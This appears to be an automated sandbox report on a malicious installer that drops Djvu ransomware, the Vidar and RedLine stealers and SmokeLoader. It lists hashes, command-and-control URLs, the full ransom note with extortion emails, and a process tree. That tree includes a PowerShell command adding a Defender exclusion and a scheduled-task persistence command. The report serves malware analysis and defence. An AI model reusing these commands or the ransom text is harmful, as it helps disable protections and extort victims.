Resubmissions

07-09-2021 17:26

210907-vzzaxsdae6 10

07-09-2021 13:18

210907-qkaa2acfe3 10

06-09-2021 17:52

210906-wfz9jsbch4 10

06-09-2021 17:51

210906-wfnwhsbch3 10

06-09-2021 13:27

210906-qp3hdaedaj 10

06-09-2021 09:28

210906-lfpgyaeael 10

06-09-2021 04:33

210906-e6mmpsaaa2 10

05-09-2021 05:25

210905-f4h26sfab6 10

04-09-2021 21:32

210904-1dqdsahfdj 10

04-09-2021 21:19

210904-z56z6shfck 10

Analysis

  • max time kernel
    1761s
  • max time network
    1822s
  • platform
    windows10_x64
  • resource
    win10-jp
  • submitted
    05-09-2021 05:25

General

  • Target

    setup_x86_x64_install.exe

  • Size

    2.2MB

  • MD5

    e3b3a95ef03de0de77cca7a54ea22c94

  • SHA1

    d318d234f8f27f25de660d9881113df9d11c24ff

  • SHA256

    baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

  • SHA512

    3c1c6254f14491bc2cb096d8b46d0d65e096dac331bab2df9c5b173271eef1b9a9deb831f212a0117fab16665277208d0c1b5183ea600cc2bbe6f9049c57ad0d

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://shellloader.com/welcome

Extracted

Path

C:\_readme.txt

Family

djvu

Ransom Note
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-vsuuyeLSKk Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: manager@mailtemp.ch Reserve e-mail address to contact us: managerhelper@airmail.cc Your personal ID: 0332gDrgofRiXRqq62TeogIfmpihYZJ6wDmuUVD07WwczX6Bm
Emails

manager@mailtemp.ch

managerhelper@airmail.cc

URLs

https://we.tl/t-vsuuyeLSKk

Extracted

Family

vidar

Version

40.4

Botnet

706

C2

https://romkaxarit.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32
rc4.i32

Signatures

  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Modifies system executable filetype association 2 TTPs 3 IoCs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Registers COM server for autorun 1 TTPs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 49 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 8 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 48 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 17 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 30 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 46 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 24 IoCs
  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 17 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2788
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2692
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2680
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2436
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2408
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1860
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1384
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1372
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1240
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1112
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:1048
                        • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                          2⤵
                          • Executes dropped EXE
                          PID:7180
                        • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                          C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                          2⤵
                          • Executes dropped EXE
                          PID:8116
                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          PID:6824
                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                            3⤵
                              PID:400
                              • C:\Windows\SysWOW64\schtasks.exe
                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                4⤵
                                • Creates scheduled task(s)
                                PID:7936
                          • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                            C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                            2⤵
                              PID:6264
                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                              2⤵
                              • Suspicious use of SetThreadContext
                              PID:7732
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                3⤵
                                  PID:7276
                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                2⤵
                                • Suspicious use of SetThreadContext
                                PID:2180
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                  3⤵
                                    PID:6276
                                • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                  2⤵
                                    PID:6808
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                    2⤵
                                    • Suspicious use of SetThreadContext
                                    PID:3772
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                      3⤵
                                        PID:5904
                                    • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                      C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                      2⤵
                                        PID:5572
                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                        2⤵
                                        • Suspicious use of SetThreadContext
                                        PID:8056
                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                          3⤵
                                            PID:5936
                                        • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                          C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                          2⤵
                                            PID:7368
                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                            2⤵
                                            • Suspicious use of SetThreadContext
                                            PID:7748
                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                              3⤵
                                                PID:4996
                                            • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                              C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                              2⤵
                                                PID:1220
                                              • C:\Users\Admin\AppData\Roaming\vhhhjta
                                                C:\Users\Admin\AppData\Roaming\vhhhjta
                                                2⤵
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: MapViewOfSection
                                                PID:6468
                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                2⤵
                                                • Suspicious use of SetThreadContext
                                                PID:7504
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                  3⤵
                                                    PID:6744
                                                • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                  2⤵
                                                    PID:4776
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                    2⤵
                                                    • Suspicious use of SetThreadContext
                                                    PID:8016
                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                      3⤵
                                                        PID:4132
                                                    • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                      C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                      2⤵
                                                        PID:6152
                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                        2⤵
                                                        • Suspicious use of SetThreadContext
                                                        PID:2812
                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                          3⤵
                                                            PID:7764
                                                        • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                          C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                          2⤵
                                                            PID:7324
                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                            2⤵
                                                            • Suspicious use of SetThreadContext
                                                            PID:6096
                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                              3⤵
                                                                PID:4824
                                                            • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                              C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                              2⤵
                                                                PID:6632
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                2⤵
                                                                • Suspicious use of SetThreadContext
                                                                PID:6460
                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                  3⤵
                                                                    PID:1404
                                                                • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                  2⤵
                                                                    PID:7068
                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                    2⤵
                                                                    • Suspicious use of SetThreadContext
                                                                    PID:6904
                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                      3⤵
                                                                        PID:7988
                                                                    • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                      2⤵
                                                                        PID:3768
                                                                      • C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe
                                                                        C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe --Task
                                                                        2⤵
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:6996
                                                                        • C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe
                                                                          C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe --Task
                                                                          3⤵
                                                                            PID:1200
                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                          2⤵
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4428
                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                            3⤵
                                                                              PID:4424
                                                                          • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                            2⤵
                                                                              PID:3000
                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                              2⤵
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:4376
                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                3⤵
                                                                                  PID:3864
                                                                              • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                2⤵
                                                                                  PID:6800
                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                  2⤵
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4460
                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                    3⤵
                                                                                      PID:4436
                                                                                  • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                    2⤵
                                                                                      PID:7116
                                                                                    • C:\Users\Admin\AppData\Roaming\vhhhjta
                                                                                      C:\Users\Admin\AppData\Roaming\vhhhjta
                                                                                      2⤵
                                                                                      • Checks SCSI registry key(s)
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:1144
                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                      2⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4788
                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                        3⤵
                                                                                          PID:7976
                                                                                      • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                        2⤵
                                                                                          PID:6516
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          2⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:4732
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            3⤵
                                                                                              PID:3780
                                                                                          • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                            2⤵
                                                                                              PID:5512
                                                                                            • C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe
                                                                                              C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe --Task
                                                                                              2⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:6888
                                                                                              • C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe
                                                                                                C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe --Task
                                                                                                3⤵
                                                                                                  PID:4852
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                2⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:1328
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  3⤵
                                                                                                    PID:6832
                                                                                                • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                  2⤵
                                                                                                    PID:4812
                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    2⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:5596
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      3⤵
                                                                                                        PID:6488
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                      2⤵
                                                                                                        PID:4144
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        2⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:6224
                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          3⤵
                                                                                                            PID:6292
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                          2⤵
                                                                                                            PID:2352
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                            C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                            2⤵
                                                                                                              PID:3748
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                              2⤵
                                                                                                                PID:8188
                                                                                                              • C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe
                                                                                                                C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe --Task
                                                                                                                2⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:6348
                                                                                                                • C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe
                                                                                                                  C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe --Task
                                                                                                                  3⤵
                                                                                                                    PID:1868
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                  2⤵
                                                                                                                    PID:1904
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    2⤵
                                                                                                                      PID:6448
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        3⤵
                                                                                                                          PID:5980
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                        2⤵
                                                                                                                          PID:972
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                          2⤵
                                                                                                                            PID:6808
                                                                                                                          • C:\Users\Admin\AppData\Roaming\vhhhjta
                                                                                                                            C:\Users\Admin\AppData\Roaming\vhhhjta
                                                                                                                            2⤵
                                                                                                                              PID:3608
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                              2⤵
                                                                                                                                PID:900
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                2⤵
                                                                                                                                  PID:1848
                                                                                                                                • C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\2cb3a0cf-5e62-4969-b0ca-53644a87985f\4041.exe --Task
                                                                                                                                  2⤵
                                                                                                                                    PID:5236
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
                                                                                                                                    2⤵
                                                                                                                                      PID:1896
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                    1⤵
                                                                                                                                      PID:68
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                      PID:4372
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                                        2⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                        PID:4136
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS82069A74\setup_install.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zS82069A74\setup_install.exe"
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                          PID:1712
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:776
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                              5⤵
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:1016
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
                                                                                                                                            4⤵
                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                            PID:872
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS82069A74\Fri1544861ac3fe6a.exe
                                                                                                                                              Fri1544861ac3fe6a.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:1344
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 764
                                                                                                                                                6⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Program crash
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:5604
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1344 -s 816
                                                                                                                                                6⤵
                                                                                                                                                • Program crash
